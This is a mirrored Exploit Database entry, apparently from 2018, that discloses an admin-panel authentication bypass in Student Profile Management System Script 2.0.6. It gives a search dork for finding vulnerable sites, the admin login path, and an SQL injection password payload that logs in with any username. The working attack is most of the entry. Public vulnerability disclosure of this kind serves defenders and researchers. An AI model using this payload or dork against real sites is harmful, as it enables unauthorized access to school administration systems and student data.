Student Profile Management System Script 2.0.6 – Authentication Bypass

• Exploit Database
• 32 阅读

• 作者： L0RD
  日期： 2018-02-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43980/

• # Exploit title: Student Profile Management System Script 2.0.6 - Admin
  Panel Authentication Bypass
  # Dork: "Powered by: i-Net Solution"
  # Date: 2018-02-06
  # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
  # Vendor Homepage:
  Student Profile Management System Script
  
  # Version: 2.0.6
  # Category: Webapps
  # CVE: N/A
  # # # # #
  # Description:
  # With this exploit,Attacker can bypass admin panel Authentication.
  # # # # #
  # Proof of Concept:
  
  # username : anything
  # password : admin' or 'a'='a
  # admin panel login : /admin_login.php